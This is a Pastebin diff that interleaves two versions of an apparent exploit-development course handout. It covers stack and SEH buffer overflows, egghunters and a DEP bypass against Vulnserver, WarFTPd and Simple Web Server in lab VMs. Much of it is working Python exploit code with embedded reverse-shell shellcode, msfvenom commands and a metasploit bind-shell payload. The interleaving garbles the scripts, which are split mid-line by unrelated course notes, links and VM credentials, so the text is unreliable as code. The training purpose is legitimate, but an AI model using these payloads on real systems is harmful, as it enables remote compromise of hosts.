View difference between Paste ID: <a href="/xaRxgYqQ">xaRxgYqQ</a> and <a href="/VfwhT8Yd">VfwhT8Yd</a> - Pastebin.com

View difference between Paste ID: xaRxgYqQ and VfwhT8Yd

SHOW: | | - or go back to the newest paste.

San Diego Exploit Development 2018

# Exploit Development 2018 #
Whitepapers of interest:

https://www.sans.org/reading-room/whitepapers/firewalls/tactical-data-diodes-industrial-automation-control-systems-36057






#######################
# VMs for this course #
#######################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
    username: workshop
    password: password
   
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts
 
You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).





#######################################################
# Files you may find helpful for learning Exploit Dev #
#######################################################
https://s3.amazonaws.com/secureninja/files/slides.zip






#####################################
# Quick Stack Based Buffer Overflow #
#####################################
 
- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
 
- Extract this zip file to your Desktop
 
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
 
- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
--------------------------------------------------------------------------

- In the new command prompt window where you ran nc type:
HELP
 
- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
 
- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
 
 
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
 
- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
 
- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
 
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
 
- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
 
- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
 
4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
 
5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
 
6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
 
7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444
 
8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
 
 
------------------------------

---------------------------Type This-----------------------------------

 
cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
 
vi vulnserv.rb    (paste the code into this file)


cd ~/toolz/metasploit
 
./msfconsole
 
 
 
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST CHANGEME-TO-YOUR-WIN7-IP
set RPORT 9999
exploit
-----------------------------------------------------------------------

-----------------------------------------------------------------------------------
Day 1 Homework:
Watch the following videos and take notes for questions tomorrow.
 
http://www.securitytube.net/video/1389
http://www.securitytube.net/video/1398
http://www.securitytube.net/video/1399


You can download the Secure Ninja courseware here:

https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx


#########
Morning challenge:

Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver.


********************************************************
* Vulnserver – GMON command SEH based overflow exploit *
********************************************************

-  GMON command has a vulnerability, too, however this vulnerability is SEH based. The proof of concept python script:

--------------------------Code--------------------------------

#!/usr/bin/python

import socket

characters = 'A' * 5050


 
You can download the Secure Ninja courseware here:
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send('GMON /.:/' + characters)
Morning challenge:
expl.close()
Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine.

--------------------------------------------------------------
NOTE: If you did the SMail exploit on Windows XP yesterday, then please do it on Windows 7 today prior to doing the Easy File Sharing Web Server 7.2 exploit.

1. Identify the position of EIP. When the application crashes, select View/SEH chain.

2. As it can be seen, the SE handler is overwritten with A characters. Create a pattern with the Metasploit  tool, update the script and send the buffer to the application.
Day 3 Homework:

3. Calculate offset (From here the offset is 3519)
https://s3.amazonaws.com/secureninja/videos/0006-Intro-to-Mona.mp4

https://s3.amazonaws.com/secureninja/videos/0007-Mona-continued.mp4
4. Update python script:
https://s3.amazonaws.com/secureninja/videos/0014-DEP-Basics.mp4

https://s3.amazonaws.com/secureninja/videos/0015-Bypassing-DEP-using-ROP-chains.mp4
--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys
You can download the Secure Ninja courseware here:

https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx

buffer = 'GMON /.:/' + 'A' * 3519 + '\x42\x42\x42\x42' + 'C' * (5050 - 3519 - 4)

Morning challenge:
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine.
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

All of the content
--------------------------------------------------------------

You can download the Exploit Dev VMs from the links below:
5. Crash the application with the updated script. The offset seems to correct.
https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip

https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
6. Check bad characters - Update Python script to check bad characters:
user:	Administrator

pass: 	strategicsec
--------------------------Code--------------------------------

https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
#!/usr/bin/python
user:	strategicsec

pass: 	strategicsec

import os
import sys
https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip

user: exploitlab

pass: exploitlab

chars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
All of the exploit script listed below is contained in the following zip file. Please download it to your XP-ED-Attack-Host VM. The password for the zip file is: joemccray
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
###########################
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
# Lab 1a: Stack Overflows #
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
###########################
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
	#################################
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
	# Start WarFTPd			        #
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
	# Start WinDBG			        #
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
	# Press F6			            #
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
	# Attach to war-ftpd.exe	    #
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
	#################################
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = 'GMON /.:/' + 'A' * (3519 - len(chars)) + chars + '\x42\x42\x42\x42' + 'C' * (5050 - 3519 - 4)
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
python warftpd1.py | nc XPSP3-ED-Target-IP 21
expl.recv(100)
expl.send(buffer)
expl.close()
	At WINDBG prompt

	“r” to show registers or “alt+4”
--------------------------------------------------------------

- I placed the characters after the four B, but it did not trigger SEH based overflow. Then I placed them before the four B. The characters looks good. The only bad character is the zero.

	dd esp
7. Find address for EIP:

- In case of SEH based overflow, we have two important things to remember. The first one is that there are some protection against SEH and not all module is appropriate. There is an OllyDbg plugin which lists modules whether it contains SEH protection or not. The plugin can be downloaded from here: http://www.openrce.org/downloads/details/244/OllySSEH
- The DLL should be copied next to the OllyDbg exe. Then a new submenu will appear in the plugin menu. (SafeSEH OFF)

python warftpd2.py | nc XPSP3-ED-Target-IP 21
- There are two modules which were not compiled with SEH protection. The address of vulnserver.exe contains zero character, so that it is not appropriate for us. The other module is essfunc.dll and it might be good.

- In  case of buffer overflow, we have to find a JMP os CALL instruction. In case of SEH overflow, we have to find a sequence of instructions, POP-POP-RET. The structure of the SEH contains three values on the stack. The first and second POP removes the first two values. The third instruction is the RET. As the third value is the EIP, the RET instruction will move it into EIP.

	At WINDBG prompt
- In  order to find a sequence of values in OllyDbg, open the essfunc.dll module, right click on the code and select Search for/All sequences. In the dialog box, type the following:
	“r” to show registers or “alt+4”

POP r32
POP r32
RETN
	dd esp

- Select one of the addresses and double click on it. Copy the selected into the script.

	Eip: 32714131

	esp: affd58		(71413471)
--------------------------Code--------------------------------

	Now we need to SSH into the StrategicSec Ubuntu host
#!/usr/bin/python

import socket
import os
	cd /home/strategicsec/toolz/metasploit/tools


	ruby pattern_offset.rb 32714131
# 625011B3 POP-POP-RET from essfunc.dll
	485

	
buffer = 'GMON /.:/' + 'A' * 3519 + '\xb3\x11\x50\x62' + 'C' * (5050 - 3519 - 4)
	ruby pattern_offset.rb 71413471

	493
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
	Distance to EIP is: 		485
expl.send(buffer)
	Relative position of ESP is: 	493
expl.close()

	RET – POP EIP
-------------------------------------------------------------- 
	RET 4 – POP EIP and shift ESP down by 4 bytes

8.  First stage payload


	cd /home/strategicsec/toolz/metasploit/
- Let us crash the application with this updated script and see, what the SE handler isl.
	./msfpescan -j ESP DLLs/xpsp3/shell32.dll

      # 625011B3 POP-POP-RET from essfunc.dll

		0x7c9c167d push esp; retn 0x304d
- Place a breakpoint on the address (Select it and press F2) and press Shift + F9. Then go through the POP-POP-RET instructions (press F7 three times). We stop 4 bytes before the EIP address.
		0x7c9d30d7 jmp esp < - how about we use this one

		0x7c9d30eb jmp esp
- Four bytes is not too much. We can jump here to somewhere else. A short jump is only two bytes. Let us jump after the EIP. Jump to the point where the buffer, which contains the 0x43 bytes, starts. The other two bytes can be filled with NOPs.
		0x7c9d30ff jmp esp

     # 017BFFC4   EB 06            JMP SHORT 017BFFCC

		warftpd3.py with Notepad++
- This JMP instruction can be considered as the first stage payload.
		Fill in the appropriate values

		Distance to EIP

		Address of JMP ESP
9. Second stage payload

- After we execute the JMP instructions, we have just a few bytes to execute (from 0174FFCB to 0174FFFF, this is only 34 bytes). There are lot of space in the As buffer, before the EIP address. We can place the reverse shell payload there and jump there from here somehow. The reverse shell can be considered as a third stage payload, and the code, which jumps to it, is the second stage payload.

- One possible solution is to get the EIP with a trick, subtract some value from it and jump to that address. The assembly code of this trick:
python warftpd3.py | nc XPSP3-ED-Target-IP 21

second_stage.asm
	0:003> dd eip

	0:003> dd esp
------------------------------------------------
global _start

_start:

fldz
fnstenv [esp-12]
	Mention bad characters
pop ecx
	No debugger
add cl, 10
nop

dec ch		; ecx=-256;
dec ch		; ecx=-256;
python warftpd4.py | nc XPSP3-ED-Target-IP 21
jmp ecx		; lets jmp ecx (current location - 512)

nc XPSP3-ED-Target-IP 4444
-------------------------------------------------

- Let us place this code in the Cs buffer and the reverse shell payload into the As buffer. The reverse shell payload should be placed next to the EIP address and the characters should be NOP instructions.

- The structure of the buffer:
###########################################

# Lab 1b: Stack Overflows with DEP Bypass #
  NOP instructions | Reverse Shell payload | Short JMP | NOP | NOP | EIP | Second Stage payload
###########################################

# shellcode:  ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.243.166 LPORT=4449 -b "\x00" -f c EXITFUNC=thread
Reboot your target host and choose the "2nd" option for DEP.

- The first version of exploit:

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
--------------------------Code--------------------------------

import socket
import os
import sys
python warftpd1.py | nc XPSP3-ED-Target-IP 21

buf = ("\xbb\xd4\x42\x7c\xae\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
	At WINDBG prompt
"\x52\x83\xea\xfc\x31\x5a\x0e\x03\x8e\x4c\x9e\x5b\xd2\xb9\xdc"
	“r” to show registers or “alt+4”
"\xa4\x2a\x3a\x81\x2d\xcf\x0b\x81\x4a\x84\x3c\x31\x18\xc8\xb0"
"\xba\x4c\xf8\x43\xce\x58\x0f\xe3\x65\xbf\x3e\xf4\xd6\x83\x21"
	dd esp
"\x76\x25\xd0\x81\x47\xe6\x25\xc0\x80\x1b\xc7\x90\x59\x57\x7a"
"\x04\xed\x2d\x47\xaf\xbd\xa0\xcf\x4c\x75\xc2\xfe\xc3\x0d\x9d"
"\x20\xe2\xc2\x95\x68\xfc\x07\x93\x23\x77\xf3\x6f\xb2\x51\xcd"
"\x90\x19\x9c\xe1\x62\x63\xd9\xc6\x9c\x16\x13\x35\x20\x21\xe0"
"\x47\xfe\xa4\xf2\xe0\x75\x1e\xde\x11\x59\xf9\x95\x1e\x16\x8d"
python warftpd2.py | nc XPSP3-ED-Target-IP 21
"\xf1\x02\xa9\x42\x8a\x3f\x22\x65\x5c\xb6\x70\x42\x78\x92\x23"
"\xeb\xd9\x7e\x85\x14\x39\x21\x7a\xb1\x32\xcc\x6f\xc8\x19\x99"
"\x5c\xe1\xa1\x59\xcb\x72\xd2\x6b\x54\x29\x7c\xc0\x1d\xf7\x7b"
	At WINDBG prompt
"\x27\x34\x4f\x13\xd6\xb7\xb0\x3a\x1d\xe3\xe0\x54\xb4\x8c\x6a"
	“r” to show registers or “alt+4”
"\xa4\x39\x59\x3c\xf4\x95\x32\xfd\xa4\x55\xe3\x95\xae\x59\xdc"
	dd esp
"\x86\xd1\xb3\x75\x2c\x28\x54\xba\x19\xc1\x02\x52\x58\x25\x5a"
"\xc2\xd5\xc3\x36\x14\xb0\x5c\xaf\x8d\x99\x16\x4e\x51\x34\x53"
"\x50\xd9\xbb\xa4\x1f\x2a\xb1\xb6\xc8\xda\x8c\xe4\x5f\xe4\x3a"
	Eip: 32714131
"\x80\x3c\x77\xa1\x50\x4a\x64\x7e\x07\x1b\x5a\x77\xcd\xb1\xc5"
	esp: affd58		(71413471)
"\x21\xf3\x4b\x93\x0a\xb7\x97\x60\x94\x36\x55\xdc\xb2\x28\xa3"
"\xdd\xfe\x1c\x7b\x88\xa8\xca\x3d\x62\x1b\xa4\x97\xd9\xf5\x20"
	Now we need to SSH into the StrategicSec Ubuntu host
"\x61\x12\xc6\x36\x6e\x7f\xb0\xd6\xdf\xd6\x85\xe9\xd0\xbe\x01"
"\x92\x0c\x5f\xed\x49\x95\x7f\x0c\x5b\xe0\x17\x89\x0e\x49\x7a"
"\x2a\xe5\x8e\x83\xa9\x0f\x6f\x70\xb1\x7a\x6a\x3c\x75\x97\x06"
"\x2d\x10\x97\xb5\x4e\x31")
	cd /home/strategicsec/toolz/metasploit/tools

# 625011B3 POP-POP-RET from essfunc.dll
	ruby pattern_offset.rb 32714131

	485
# 017BFFC4   EB 06            JMP SHORT 017BFFCC
	

	ruby pattern_offset.rb 71413471
first_stage = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"
	493

buffer = "GMON /.:/" + "\x90" * (3515 - len(buf)) + buf + "\xeb\x06\x90\x90" + "\xb3\x11\x50\x62" + first_stage + "C" * (5050 - 3519 - 4 - len(first_stage))
 
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

cd /home/strategicsec/toolz/metasploit/tools
-------------------------------------------------------------

ruby pattern_offset.rb 32714131
- The other possible solution is if we use an egghunter. The egghunter is a small code which searches the Virtual Address Space for a certain pattern and if it finds the pattern, then it starts to execute the code after the pattern. The pattern is four byte long. In order to avoid finding the pattern in the egghunter, the four byte should be repeated twice.

cd /home/strategicsec/toolz/metasploit/
- The structure of the buffer:

./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
   NOP instructions | EGG | EGG | Reverse Shell payload | Short JMP | NOP | NOP | EIP | Egghunter

# shellcode:  ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.243.166 LPORT=4449 -b "\x00" -f c EXITFUNC=thread

python warftpd3.py | nc XPSP3-ED-Target-IP 21
- The second version of exploit:

	0:003> dd eip
--------------------------Code--------------------------------
	0:003> dd esp

#!/usr/bin/python
INT3s - GOOD!!!!!!!

import socket
import os
import sys
python warftpd4.py | nc XPSP3-ED-Target-IP 21


nc XPSP3-ED-Target-IP 4444
buf = ("\xbb\xd4\x42\x7c\xae\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x5a\x0e\x03\x8e\x4c\x9e\x5b\xd2\xb9\xdc"
"\xa4\x2a\x3a\x81\x2d\xcf\x0b\x81\x4a\x84\x3c\x31\x18\xc8\xb0"
"\xba\x4c\xf8\x43\xce\x58\x0f\xe3\x65\xbf\x3e\xf4\xd6\x83\x21"
strategicsec....exploit no workie!!!!
"\x76\x25\xd0\x81\x47\xe6\x25\xc0\x80\x1b\xc7\x90\x59\x57\x7a"
"\x04\xed\x2d\x47\xaf\xbd\xa0\xcf\x4c\x75\xc2\xfe\xc3\x0d\x9d"
"\x20\xe2\xc2\x95\x68\xfc\x07\x93\x23\x77\xf3\x6f\xb2\x51\xcd"
Why????????? DEP!!!!!!!!!!!!!
"\x90\x19\x9c\xe1\x62\x63\xd9\xc6\x9c\x16\x13\x35\x20\x21\xe0"
"\x47\xfe\xa4\xf2\xe0\x75\x1e\xde\x11\x59\xf9\x95\x1e\x16\x8d"
"\xf1\x02\xa9\x42\x8a\x3f\x22\x65\x5c\xb6\x70\x42\x78\x92\x23"
"\xeb\xd9\x7e\x85\x14\x39\x21\x7a\xb1\x32\xcc\x6f\xc8\x19\x99"
"\x5c\xe1\xa1\x59\xcb\x72\xd2\x6b\x54\x29\x7c\xc0\x1d\xf7\x7b"
Let's look through ole32.dll for the following instructions:
"\x27\x34\x4f\x13\xd6\xb7\xb0\x3a\x1d\xe3\xe0\x54\xb4\x8c\x6a"
"\xa4\x39\x59\x3c\xf4\x95\x32\xfd\xa4\x55\xe3\x95\xae\x59\xdc"
mov al,0x1
"\x86\xd1\xb3\x75\x2c\x28\x54\xba\x19\xc1\x02\x52\x58\x25\x5a"
ret 0x4
"\xc2\xd5\xc3\x36\x14\xb0\x5c\xaf\x8d\x99\x16\x4e\x51\x34\x53"
"\x50\xd9\xbb\xa4\x1f\x2a\xb1\xb6\xc8\xda\x8c\xe4\x5f\xe4\x3a"
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
"\x80\x3c\x77\xa1\x50\x4a\x64\x7e\x07\x1b\x5a\x77\xcd\xb1\xc5"
"\x21\xf3\x4b\x93\x0a\xb7\x97\x60\x94\x36\x55\xdc\xb2\x28\xa3"
"\xdd\xfe\x1c\x7b\x88\xa8\xca\x3d\x62\x1b\xa4\x97\xd9\xf5\x20"
"\x61\x12\xc6\x36\x6e\x7f\xb0\xd6\xdf\xd6\x85\xe9\xd0\xbe\x01"
"\x92\x0c\x5f\xed\x49\x95\x7f\x0c\x5b\xe0\x17\x89\x0e\x49\x7a"
./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
"\x2a\xe5\x8e\x83\xa9\x0f\x6f\x70\xb1\x7a\x6a\x3c\x75\x97\x06"
"\x2d\x10\x97\xb5\x4e\x31")

[DLLs/xpsp3/ole32.dll]
# 625011B3 POP-POP-RET from essfunc.dll
0x775ee00e b001c204

0x775ee00e      mov al, 1
# 017BFFC4   EB 06            JMP SHORT 017BFFCC
0x775ee010      ret 4

first_stage = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

Then we need to jump to the LdrpCheckNXCompatibility routine in 
egg = "\x54\x30\x30\x57"	# 0x57303054
ntdll.dll that disables DEP.

buffer = "GMON /.:/" + "\x90" * (3515 - 4 - 4 - len(buf)) + egg + egg + buf + "\xeb\x06\x90\x90" + "\xb3\x11\x50\x62" + first_stage + "C" * (5050 - 3519 - 4 - len(first_stage))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Inside of ntdll.dll we need to find the following instructions:
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
CMP AL,1
expl.send(buffer)
PUSH 2
expl.close()
POP ESI

JE ntdll.7
---------------------------------------------------------------



Today, let's work on the Konica Minolta SEH overwrite. You can look at the public exploit code, and download the target vulnerable application from here:
./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
https://www.exploit-db.com/exploits/39215/

You can download the attack scripts from today from here:
[DLLs/xpsp3/ntdll.dll]
https://s3.amazonaws.com/infosecaddictsfiles/2018-Exploit-Dev.zip
0x7c91cd24 3c016a025e0f84

0x7c91cd24      cmp al, 1

0x7c91cd26      push 2

0x7c91cd28      pop esi
Quick challenge:
0x7c91cd29      jz 7
Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.


This set of instructions makes sure that AL is set to 1, 2 is pushed 

on the stack then popped into ESI.

Watch the following videos and take notes for questions tomorrow.
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


dep = "\x0e\xe0\x5e\x77"+\

"\xff\xff\xff\xff"+\

"\x24\xcd\x91\x7c"+\

"\xff\xff\xff\xff"+\

"A"*0x54

# Day 3 #
#########

*****************************************************
python warftpd5.py | nc XPSP3-ED-Target-IP 21
* Vulnserver – KSTET command exploit with egghunter *
*****************************************************
nc XPSP3-ED-Target-IP 4444

--------------------------Code--------------------------------

#!/usr/bin/python
########################################

# Lab 2a: Not Enough Space (Egghunter) #

########################################

import sys


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
buffer = "KSTET /.:/" + "A" * 5011

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SWS - SIMPLE WEB SERVER
expl.connect(('127.0.0.1', 9999))
-----------------------
expl.recv(100)
expl.send(buffer)
Running SWS on Strategicsec-XP-ED-Target-VM
expl.close()
Start > Programs > Simple Web Server (it's in the middle somewhere)

Red icon in system tray
-------------------------------------------------------------
Double click it

- it will pop up a menu
- The value of EIP is 0x41414141. It is overwritten with our As. It is a simple buffer overflow exploit. 
- select "start"

- dialog box shows starting params - port 82
- However only 90 A characters are in the memory.

WinDBG
- This place is too small for a reverse shell, but enough for an egghunter. The egghunter is a small code which searches for a unique pattern (the egg) in the memory, and if it finds the pattern, the egghunter starts to execute the code after the unique pattern.
- attach to "server.exe"

- The exploit development steps are the same as in the previous cases:

1. We have to find the offset from where the EIP is overwritten.
python sws1.py | nc XPSP3-ED-Target-IP 82
2. Then we have to find an address. In our case JMP ESP is a good candidate as the ESP points into the middle of the As buffer.
3. We have 20 byte to jump to the beginning of the As buffer.
4. The egghunter should be placed right after the ‘KSTET /.:/’.
5. The reverse shell should be placed somehow into the memory with the egg.
python sws2.py | nc XPSP3-ED-Target-IP 82

--------------------------Code--------------------------------

SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
#!/usr/bin/python
cd /home/strategicsec/toolz/metasploit/tools

ruby pattern_offset.rb 41356841				<------- You should see that EIP is at 225

ruby pattern_offset.rb 68413668				<------- You should see that ESP is at 229

import sys


# 62501205 from essfunc.dll	JMP ESP

buffer = "KSTET /.:/" + "A" * 66 + "\x05\x12\x50\x62" + "C" * (5011 - 66 - 4)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
EGGHUNTER:
expl.recv(100)
----------
expl.send(buffer)
expl.close()
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"

"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
--------------------------------------------------------------
          ^^^^^^^^^^^^^^^^

               ABBA
1. Jump backward
                                         JMP ESP
- We have 20 bytes to jump backward. (The 0x43 part of the memory.)
                                        /

                                       /
- The hex code of JMP SHORT instruction is 0xeb. The second byte tells us, how many bytes to jump. If this byte is lower than 0x80, it jumps forward. If the value is greater than or equal with 0x80, it jumps backward. Obviously it can jump no more than 127 byte.
GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0

User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
- We do not need to know the code if we use OllyDbg. Simply double click on the 0178f9e0 line and write in the box JMP SHORT and the address of the position where it should jump.

 - Great! The two hex codes are 0xeb and 0xb8. Update the script with them and also add the egghunter code to it.

- The updated code:
-----sws3.py-----

#!/usr/bin/python2
--------------------------Code--------------------------------

import os # for output setting
#!/usr/bin/python
import sys 

import struct # for pack function

import os
# turn off output buffer and set binary mode

sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)



pad = "A" * 225        # distance to EIP
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
eip = 0x7e429353       # replace EIP to point to "jmp esp" from user32.dll


egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
# 62501205 from essfunc.dll	JMP ESP
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

# eb b8		jmp short
shellcode = "\xCC" * 700

buffer = "KSTET /.:/" + egghunter + "\xCC" * (66 - len(egghunter)) + "\x05\x12\x50\x62" + "\xeb\xb8" + "C" * (5011 - 66 - 4 - 2)
buf = "GET /"

buf += pad + struct.pack('<I', eip) + egghunter
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buf += " HTTP/1.0\r\n"
expl.connect(('127.0.0.1', 9999))
buf += "User-Agent: ABBAABBA"
expl.recv(100)
buf += shellcode
expl.send(buffer)
buf += " HTTP/1.0\r\n"
expl.close()

sys.stdout.write(buf)
-------------------------------------------------------------
-----


############################################
2. Place shellcode with egghunter into the memory
# Lab 2b: Not Enough Space (Negative Jump) #

############################################
- We have a few command we can send to VulnServer. One of them might be good for our purpose and keeps the shellcode in memory. We update our code, so that it sends a command with a parameter, where the parameter is our shellcode with the egg. Then we send the KSTET command with our crafted buffer. When the buffer overflow is triggered, we search the memory for the egg. If we find it, then the command is good. This is a trial and error process.

- GDOG command keeps the passed parameter in the memory. The updated shellcode:

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
--------------------------Code--------------------------------

#!/usr/bin/python

[pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]

import os
									^

1 ----------------------1 overflow the buffer---------------------------|

									

									^		             ^

									| 

									2 ----jump over seh record---|
shellcode =  ""
shellcode += "\xdb\xd1\xd9\x74\x24\xf4\x5a\x2b\xc9\xbd\x0e\x55\xbd"
												     ^				^	
shellcode += "\x38\xb1\x52\x31\x6a\x17\x83\xc2\x04\x03\x64\x46\x5f"
												     |
shellcode += "\xcd\x84\x80\x1d\x2e\x74\x51\x42\xa6\x91\x60\x42\xdc"
												     3--POP 2 words off stack---|
